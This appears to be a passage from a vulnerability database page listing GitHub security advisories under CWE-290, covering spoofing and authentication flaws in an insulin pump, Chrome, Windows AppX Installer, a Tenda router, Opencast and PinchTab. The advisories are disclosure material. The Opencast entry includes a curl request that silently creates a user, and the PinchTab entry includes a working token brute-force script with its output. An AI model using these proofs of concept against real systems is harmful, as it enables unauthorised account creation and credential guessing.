CWE-290
AllowedAuthentication Bypass by Spoofing
Abstraction: Base · Status: Incomplete
This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.
927 vulnerabilities reference this CWE, most recent first.
GHSA-HPQ4-RVV8-G82J
Vulnerability from github – Published: 2022-05-24 17:39 – Updated: 2022-05-24 17:39SOOIL Developments Co Ltd DiabecareRS,AnyDana-i & AnyDana-A, the communication protocol of the insulin pump and its AnyDana-i & AnyDana-A mobile apps doesn't use adequate measures to authenticate the communicating entities before exchanging keys, which allows unauthenticated, physically proximate attackers to eavesdrop the authentication sequence via Bluetooth Low Energy.
{
"affected": [],
"aliases": [
"CVE-2020-27276"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-19T17:15:00Z",
"severity": "MODERATE"
},
"details": "SOOIL Developments Co Ltd DiabecareRS,AnyDana-i \u0026 AnyDana-A, the communication protocol of the insulin pump and its AnyDana-i \u0026 AnyDana-A mobile apps doesn\u0027t use adequate measures to authenticate the communicating entities before exchanging keys, which allows unauthenticated, physically proximate attackers to eavesdrop the authentication sequence via Bluetooth Low Energy.",
"id": "GHSA-hpq4-rvv8-g82j",
"modified": "2022-05-24T17:39:27Z",
"published": "2022-05-24T17:39:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27276"
},
{
"type": "WEB",
"url": "https://us-cert.cisa.gov/ics/advisories/icsma-21-012-01"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HQJF-3FQ8-46PG
Vulnerability from github – Published: 2022-07-26 00:01 – Updated: 2022-07-28 00:00Inappropriate implementation in compositing in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.
{
"affected": [],
"aliases": [
"CVE-2022-1306"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-25T14:15:00Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in compositing in Google Chrome prior to 100.0.4896.88 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.",
"id": "GHSA-hqjf-3fq8-46pg",
"modified": "2022-07-28T00:00:48Z",
"published": "2022-07-26T00:01:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1306"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_11.html"
},
{
"type": "WEB",
"url": "https://crbug.com/1299287"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-25"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-HVCQ-2MCQ-RG5F
Vulnerability from github – Published: 2021-12-16 00:01 – Updated: 2025-10-22 00:32Windows AppX Installer Spoofing Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-43890"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-15T15:15:00Z",
"severity": "HIGH"
},
"details": "Windows AppX Installer Spoofing Vulnerability",
"id": "GHSA-hvcq-2mcq-rg5f",
"modified": "2025-10-22T00:32:26Z",
"published": "2021-12-16T00:01:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43890"
},
{
"type": "WEB",
"url": "https://github.com/ChrisTitusTech/winutil/pull/26"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890"
},
{
"type": "WEB",
"url": "https://thehackernews.com/2023/12/microsoft-disables-msix-app-installer.html"
},
{
"type": "WEB",
"url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-msix-protocol-handler-abused-in-malware-attacks"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-43890"
},
{
"type": "WEB",
"url": "https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HXMV-65FF-VM98
Vulnerability from github – Published: 2025-09-04 21:31 – Updated: 2025-09-05 18:31In initPhoneSwitch of SystemSettingsFragment.java, there is a possible FRP bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-26419"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T20:15:34Z",
"severity": "LOW"
},
"details": "In initPhoneSwitch of SystemSettingsFragment.java, there is a possible FRP bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.",
"id": "GHSA-hxmv-65ff-vm98",
"modified": "2025-09-05T18:31:20Z",
"published": "2025-09-04T21:31:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26419"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/wear/2025-05-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J39G-274J-3WPM
Vulnerability from github – Published: 2026-07-01 00:34 – Updated: 2026-07-01 18:31Insufficient data validation in DevTools in Google Chrome prior to 150.0.7871.47 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)
{
"affected": [],
"aliases": [
"CVE-2026-14118"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-30T23:17:23Z",
"severity": "MODERATE"
},
"details": "Insufficient data validation in DevTools in Google Chrome prior to 150.0.7871.47 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)",
"id": "GHSA-j39g-274j-3wpm",
"modified": "2026-07-01T18:31:40Z",
"published": "2026-07-01T00:34:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14118"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0175352312.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/513772764"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J44J-72M9-G4FP
Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2022-05-13 01:50MailMate before 1.11.3 mishandles a suspicious HTML/MIME structure in a signed/encrypted email.
{
"affected": [],
"aliases": [
"CVE-2018-15588"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-11T17:29:00Z",
"severity": "HIGH"
},
"details": "MailMate before 1.11.3 mishandles a suspicious HTML/MIME structure in a signed/encrypted email.",
"id": "GHSA-j44j-72m9-g4fp",
"modified": "2022-05-13T01:50:10Z",
"published": "2022-05-13T01:50:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15588"
},
{
"type": "WEB",
"url": "https://github.com/RUB-NDS/Johnny-You-Are-Fired"
},
{
"type": "WEB",
"url": "https://github.com/RUB-NDS/Johnny-You-Are-Fired/blob/master/paper/johnny-fired.pdf"
},
{
"type": "WEB",
"url": "https://updates.mailmate-app.com/release_notes"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152703/Johnny-You-Are-Fired.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2019/Apr/38"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2019/04/30/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J4MM-7PJ3-JF7V
Vulnerability from github – Published: 2021-12-14 21:43 – Updated: 2022-01-04 18:54Opencast versions prior to 9.10 allow HTTP method spoofing, allowing to change the assumed HTTP method via URL parameter. This allows attackers to turn HTTP GET requests into PUT requests or an HTTP form to send DELETE requests. This bypasses restrictions otherwise put on these types of requests and aids in cross-site request forgery (CSRF) attacks, which would otherwise not be possible.
Impact
The vulnerability allows attackers to craft links or forms which may change the server state. For example, the following GET request would create a new user:
% curl -i -u admin:opencast \
'https://legacy.opencast.org/admin-ng/users/test.json?_method=PUT&username=test&password=attack'
HTTP/2 200
…
If an admin is logged in to legacy.opencast.org and accidentally clicks this link, a user will silently be created.
Patches
This issue is fixed in Opencast 9.10 and 10.0.
Workarounds
You can mitigate the problem by setting the SameSite=Strict attribute for your cookies. If this is a viable option for you depends on your integrations. We strongly recommend updating in any case.
References
For more information
If you have any questions or comments about this advisory: * Open an issue in our issue tracker * Email us at security@opencast.org
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.opencastproject:opencast-common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-43807"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-14T18:49:26Z",
"nvd_published_at": "2021-12-14T18:15:00Z",
"severity": "HIGH"
},
"details": "Opencast versions prior to 9.10 allow HTTP method spoofing, allowing to change the assumed HTTP method via URL parameter. This allows attackers to turn HTTP GET requests into PUT requests or an HTTP form to send DELETE requests. This bypasses restrictions otherwise put on these types of requests and aids in cross-site request forgery (CSRF) attacks, which would otherwise not be possible.\n\n### Impact\n\nThe vulnerability allows attackers to craft links or forms which may change the server state. For example, the following GET request would create a new user:\n\n```sh\n% curl -i -u admin:opencast \\\n \u0027https://legacy.opencast.org/admin-ng/users/test.json?_method=PUT\u0026username=test\u0026password=attack\u0027\nHTTP/2 200\n\u2026\n```\n\nIf an admin is logged in to legacy.opencast.org and accidentally clicks this link, a user will silently be created.\n\n\n### Patches\n\nThis issue is fixed in Opencast 9.10 and 10.0.\n\n### Workarounds\n\nYou can mitigate the problem by setting the `SameSite=Strict` attribute for your cookies. If this is a viable option for you depends on your integrations. We strongly recommend updating in any case.\n\n### References\n\n- [Fix for 10.0](https://github.com/opencast/opencast/commit/59cb6731067283e54f15462be38b6117d8b9ea8b#diff-9c5fb3d1b7e3b0f54bc5c4182965c4fe1f9023d449017cece3005d3f90e8e4d8)\n- [Fix for 9.10](https://github.com/opencast/opencast/commit/8f8271e1085f6f8e306c689d6a56b0bb8d076444)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues)\n* Email us at [security@opencast.org](mailto:security@opencast.org)\n",
"id": "GHSA-j4mm-7pj3-jf7v",
"modified": "2022-01-04T18:54:12Z",
"published": "2021-12-14T21:43:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/opencast/opencast/security/advisories/GHSA-j4mm-7pj3-jf7v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43807"
},
{
"type": "WEB",
"url": "https://github.com/opencast/opencast/commit/59cb6731067283e54f15462be38b6117d8b9ea8b#diff-9c5fb3d1b7e3b0f54bc5c4182965c4fe1f9023d449017cece3005d3f90e8e4d8"
},
{
"type": "WEB",
"url": "https://github.com/opencast/opencast/commit/8f8271e1085f6f8e306c689d6a56b0bb8d076444"
},
{
"type": "PACKAGE",
"url": "https://github.com/opencast/opencast"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "HTTP Method Spoofing"
}
GHSA-J5R6-25M9-65R7
Vulnerability from github – Published: 2026-04-29 21:31 – Updated: 2026-04-29 21:31Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin cookie to change DNS servers and redirect user traffic to malicious sites.
{
"affected": [],
"aliases": [
"CVE-2018-25318"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-29T20:16:27Z",
"severity": "CRITICAL"
},
"details": "Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin cookie to change DNS servers and redirect user traffic to malicious sites.",
"id": "GHSA-j5r6-25m9-65r7",
"modified": "2026-04-29T21:31:31Z",
"published": "2026-04-29T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25318"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/44381"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/tenda-fh303-a300-68-en-cookie-session-weakness-dns-change"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-J65M-HV65-R264
Vulnerability from github – Published: 2026-03-24 19:47 – Updated: 2026-03-27 21:19Summary
PinchTab v0.7.7 through v0.8.4 contain incomplete request-throttling protections for auth-checkable endpoints. In v0.7.7 through v0.8.3, a fully implemented RateLimitMiddleware existed in internal/handlers/middleware.go but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle.
In the same pre-v0.8.4 range, the original limiter also keyed clients using X-Forwarded-For, which would have allowed client-controlled header spoofing if the middleware had been enabled. v0.8.4 addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted /health and /metrics from rate limiting even though /health remained an auth-checkable endpoint when a token was configured.
This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses 127.0.0.1 plus a generated random token in the recommended setup.
PinchTab's default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug.
This was fully addressed in v0.8.5 by applying RateLimitMiddleware in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the /health and /metrics exemption so auth-checkable endpoints are throttled as well.
Details
Issue 1 — Middleware never applied in v0.7.7 through v0.8.3:
The production server wrapped the HTTP mux without RateLimitMiddleware:
// internal/server/server.go — v0.8.3
handlers.LoggingMiddleware(
handlers.CorsMiddleware(
handlers.AuthMiddleware(cfg, mux),
// RateLimitMiddleware is not present here in v0.8.3
),
)
The function exists and is fully implemented:
// internal/handlers/middleware.go — v0.8.3
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// ... 120 req / 10s logic ...
})
}
Because RateLimitMiddleware was never referenced from the production handler chain in v0.7.7 through v0.8.3, the intended request throttling was inactive in those releases.
Issue 2 — X-Forwarded-For trust in the original limiter (v0.7.7 through v0.8.3):
Even if the middleware had been applied, the original IP identification was bypassable:
// internal/handlers/middleware.go — v0.8.3
host, _, _ := net.SplitHostPort(r.RemoteAddr) // real IP
if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
// No validation that request came from a trusted proxy
// Client can set this header to any value
host = strings.TrimSpace(strings.Split(xff, ",")[0])
}
// host is now client-influenced — rate limit key is spoofable
In v0.7.7 through v0.8.3, if the limiter had been enabled, a client could have influenced the rate-limit key through X-Forwarded-For. This made the original limiter unsuitable without an explicit trusted-proxy model.
Issue 3 — /health and /metrics remained exempt through v0.8.4:
v0.8.4 wired the limiter into production and switched to the immediate peer IP, but it still bypassed throttling for /health and /metrics:
// internal/handlers/middleware.go — v0.8.4
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
p := strings.TrimSpace(r.URL.Path)
if p == "/health" || p == "/metrics" || strings.HasPrefix(p, "/health/") || strings.HasPrefix(p, "/metrics/") {
next.ServeHTTP(w, r)
return
}
host := authn.ClientIP(r)
// ...
})
}
That left GET /health unthrottled even though it remained an auth-checkable endpoint when a server token was configured, so online guessing against that route still saw no rate-limit response through v0.8.4.
PoC
This PoC assumes the server is reachable by the attacker and that the configured API token is weak and guessable, for example password.
PoC Code
#!/usr/bin/env python3
# brute_force_poc.py — demonstrates unthrottled token guessing on /health
import urllib.request, urllib.error, time, sys
TARGET = "http://localhost:9867/health"
WORDLIST = [f"wrong-{i:03d}" for i in range(150)] + ["password"]
counts = {}
print(f"[*] Brute-forcing {TARGET} — no rate limit protection")
start = time.time()
for token in WORDLIST:
req = urllib.request.Request(TARGET)
req.add_header("Authorization", f"Bearer {token}")
try:
with urllib.request.urlopen(req, timeout=5) as r:
print(f"[+] FOUND: token={token!r} HTTP={r.status}")
counts[r.status] = counts.get(r.status, 0) + 1
sys.exit(0)
except urllib.error.HTTPError as e:
print(f"[-] token={token!r} HTTP={e.code}")
counts[e.code] = counts.get(e.code, 0) + 1
elapsed = time.time() - start
print(f"[*] {len(WORDLIST)} attempts in {elapsed:.2f}s — "
f"{len(WORDLIST)/elapsed:.0f} req/s (no 429 received)")
print(f"[*] status counts: {counts}")
After run
python3 ratelimit.py
[*] Brute-forcing http://localhost:9867/health — no rate limit protection
[-] token='wrong-000' HTTP=401
...
[-] token='wrong-149' HTTP=401
[+] FOUND: token='password' HTTP=200
[*] 151 attempts in 0.84s — 180 req/s (no 429 received)
[*] status counts: {401: 150, 200: 1}
Observation:
1. In v0.7.7 through v0.8.3, rapid requests do not return HTTP 429 because RateLimitMiddleware is not active in production.
2. In v0.8.4, the same /health PoC still does not return HTTP 429 because /health is explicitly exempted from rate limiting.
3. The PoC succeeds only when the configured token is weak and appears in the tested candidates.
4. The original X-Forwarded-For behavior in v0.7.7 through v0.8.3 shows that the first limiter design would not have been safe to rely on behind untrusted clients.
5. This PoC does not demonstrate token disclosure or authentication bypass independent of token guessability.
Impact
- Reduced resistance to online guessing of weak or reused API tokens in deployments where an attacker can reach the API.
- Loss of the intended per-IP throttling for burst requests against protected endpoints in
v0.7.7throughv0.8.3, and against/healthinv0.8.4. - Higher abuse potential for intentionally exposed deployments than intended by the middleware design.
- This issue does not by itself disclose the token, bypass authentication, or make all deployments equally affected. Installations using the default local-first posture and generated high-entropy tokens have substantially lower practical risk.
Suggested Remediation
- Apply
RateLimitMiddlewarein the production handler chain for authenticated routes. - Derive the rate-limit key from the immediate peer IP by default instead of trusting client-supplied forwarded headers.
- Do not exempt auth-checkable endpoints such as
/healthand/metricsfrom rate limiting. - Consider an additional auth-failure throttle so repeated invalid token attempts are constrained even when endpoint-level behavior changes in the future.
Screenshot capture
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/pinchtab/pinchtab"
},
"ranges": [
{
"events": [
{
"introduced": "0.7.7"
},
{
"fixed": "0.8.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33621"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T19:47:40Z",
"nvd_published_at": "2026-03-26T21:17:06Z",
"severity": "MODERATE"
},
"details": "### Summary\nPinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle.\n\nIn the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured.\n\nThis issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup.\n\nPinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug.\n\nThis was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.\n\n### Details\n**Issue 1 \u2014 Middleware never applied in `v0.7.7` through `v0.8.3`:**\nThe production server wrapped the HTTP mux without `RateLimitMiddleware`:\n\n```\n// internal/server/server.go \u2014 v0.8.3\nhandlers.LoggingMiddleware(\n handlers.CorsMiddleware(\n handlers.AuthMiddleware(cfg, mux),\n // RateLimitMiddleware is not present here in v0.8.3\n ),\n)\n```\n\nThe function exists and is fully implemented:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.3\nfunc RateLimitMiddleware(next http.Handler) http.Handler {\n startRateLimiterJanitor(rateLimitWindow, evictionInterval)\n return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n // ... 120 req / 10s logic ...\n })\n}\n```\n\nBecause `RateLimitMiddleware` was never referenced from the production handler chain in `v0.7.7` through `v0.8.3`, the intended request throttling was inactive in those releases.\n\n**Issue 2 \u2014 `X-Forwarded-For` trust in the original limiter (`v0.7.7` through `v0.8.3`):**\nEven if the middleware had been applied, the original IP identification was bypassable:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.3\nhost, _, _ := net.SplitHostPort(r.RemoteAddr) // real IP\nif xff := r.Header.Get(\"X-Forwarded-For\"); xff != \"\" {\n // No validation that request came from a trusted proxy\n // Client can set this header to any value\n host = strings.TrimSpace(strings.Split(xff, \",\")[0])\n}\n// host is now client-influenced \u2014 rate limit key is spoofable\n```\n\nIn `v0.7.7` through `v0.8.3`, if the limiter had been enabled, a client could have influenced the rate-limit key through `X-Forwarded-For`. This made the original limiter unsuitable without an explicit trusted-proxy model.\n\n**Issue 3 \u2014 `/health` and `/metrics` remained exempt through `v0.8.4`:**\n`v0.8.4` wired the limiter into production and switched to the immediate peer IP, but it still bypassed throttling for `/health` and `/metrics`:\n\n```\n// internal/handlers/middleware.go \u2014 v0.8.4\nfunc RateLimitMiddleware(next http.Handler) http.Handler {\n startRateLimiterJanitor(rateLimitWindow, evictionInterval)\n return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n p := strings.TrimSpace(r.URL.Path)\n if p == \"/health\" || p == \"/metrics\" || strings.HasPrefix(p, \"/health/\") || strings.HasPrefix(p, \"/metrics/\") {\n next.ServeHTTP(w, r)\n return\n }\n host := authn.ClientIP(r)\n // ...\n })\n}\n```\n\nThat left `GET /health` unthrottled even though it remained an auth-checkable endpoint when a server token was configured, so online guessing against that route still saw no rate-limit response through `v0.8.4`.\n\n### PoC\nThis PoC assumes the server is reachable by the attacker and that the configured API token is weak and guessable, for example `password`.\n\n**PoC Code**\n```\n#!/usr/bin/env python3\n# brute_force_poc.py \u2014 demonstrates unthrottled token guessing on /health\nimport urllib.request, urllib.error, time, sys\n\nTARGET = \"http://localhost:9867/health\"\nWORDLIST = [f\"wrong-{i:03d}\" for i in range(150)] + [\"password\"]\ncounts = {}\n\nprint(f\"[*] Brute-forcing {TARGET} \u2014 no rate limit protection\")\nstart = time.time()\nfor token in WORDLIST:\n req = urllib.request.Request(TARGET)\n req.add_header(\"Authorization\", f\"Bearer {token}\")\n try:\n with urllib.request.urlopen(req, timeout=5) as r:\n print(f\"[+] FOUND: token={token!r} HTTP={r.status}\")\n counts[r.status] = counts.get(r.status, 0) + 1\n sys.exit(0)\n except urllib.error.HTTPError as e:\n print(f\"[-] token={token!r} HTTP={e.code}\")\n counts[e.code] = counts.get(e.code, 0) + 1\n\nelapsed = time.time() - start\nprint(f\"[*] {len(WORDLIST)} attempts in {elapsed:.2f}s \u2014 \"\n f\"{len(WORDLIST)/elapsed:.0f} req/s (no 429 received)\")\nprint(f\"[*] status counts: {counts}\")\n```\n\nAfter run\n```\npython3 ratelimit.py\n[*] Brute-forcing http://localhost:9867/health \u2014 no rate limit protection\n[-] token=\u0027wrong-000\u0027 HTTP=401\n...\n[-] token=\u0027wrong-149\u0027 HTTP=401\n[+] FOUND: token=\u0027password\u0027 HTTP=200\n[*] 151 attempts in 0.84s \u2014 180 req/s (no 429 received)\n[*] status counts: {401: 150, 200: 1}\n```\n\n**Observation:**\n1. In `v0.7.7` through `v0.8.3`, rapid requests do not return HTTP 429 because `RateLimitMiddleware` is not active in production.\n2. In `v0.8.4`, the same `/health` PoC still does not return HTTP 429 because `/health` is explicitly exempted from rate limiting.\n3. The PoC succeeds only when the configured token is weak and appears in the tested candidates.\n4. The original `X-Forwarded-For` behavior in `v0.7.7` through `v0.8.3` shows that the first limiter design would not have been safe to rely on behind untrusted clients.\n5. This PoC does not demonstrate token disclosure or authentication bypass independent of token guessability.\n\n### Impact\n1. Reduced resistance to online guessing of weak or reused API tokens in deployments where an attacker can reach the API.\n2. Loss of the intended per-IP throttling for burst requests against protected endpoints in `v0.7.7` through `v0.8.3`, and against `/health` in `v0.8.4`.\n3. Higher abuse potential for intentionally exposed deployments than intended by the middleware design.\n4. This issue does not by itself disclose the token, bypass authentication, or make all deployments equally affected. Installations using the default local-first posture and generated high-entropy tokens have substantially lower practical risk.\n\n### Suggested Remediation\n1. Apply `RateLimitMiddleware` in the production handler chain for authenticated routes.\n2. Derive the rate-limit key from the immediate peer IP by default instead of trusting client-supplied forwarded headers.\n3. Do not exempt auth-checkable endpoints such as `/health` and `/metrics` from rate limiting.\n4. Consider an additional auth-failure throttle so repeated invalid token attempts are constrained even when endpoint-level behavior changes in the future.\n\n**Screenshot capture**\n\u003cimg width=\"553\" height=\"105\" alt=\"\u0e20\u0e32\u0e1e\u0e16\u0e48\u0e32\u0e22\u0e2b\u0e19\u0e49\u0e32\u0e08\u0e2d 2569-03-18 \u0e40\u0e27\u0e25\u0e32 13 03 01\" src=\"https://github.com/user-attachments/assets/ab5cd7af-5a67-40ae-aae3-1f4737afd32e\" /\u003e",
"id": "GHSA-j65m-hv65-r264",
"modified": "2026-03-27T21:19:20Z",
"published": "2026-03-24T19:47:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33621"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b"
},
{
"type": "PACKAGE",
"url": "https://github.com/pinchtab/pinchtab"
},
{
"type": "WEB",
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token"
}
GHSA-J67P-5MWC-FRF9
Vulnerability from github – Published: 2025-10-31 12:30 – Updated: 2025-10-31 12:30Therefore Corporation GmbH has recently become aware that Therefore™ Online and Therefore™ On-Premises contain an account impersonation vulnerability. A malicious user may potentially be able to impersonate the web service account or the account of a service using the API when connecting to the Therefore™ Server. If the malicious user gains this impersonation user access, then it is possible for them to access the documents stored in Therefore™. This impersonation is at application level (Therefore access level), not the operating system level.
{
"affected": [],
"aliases": [
"CVE-2025-11843"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-31T10:15:35Z",
"severity": "HIGH"
},
"details": "Therefore Corporation GmbH has recently become aware that Therefore\u2122 Online and Therefore\u2122 On-Premises contain an account impersonation vulnerability. A malicious user may potentially be able to impersonate the web service account or the account of a service using the API when connecting to the Therefore\u2122 Server. If the malicious user gains this impersonation user access, then it is possible for them to access the documents stored in Therefore\u2122. This impersonation is at application level (Therefore access level), not the operating system level.",
"id": "GHSA-j67p-5mwc-frf9",
"modified": "2025-10-31T12:30:20Z",
"published": "2025-10-31T12:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11843"
},
{
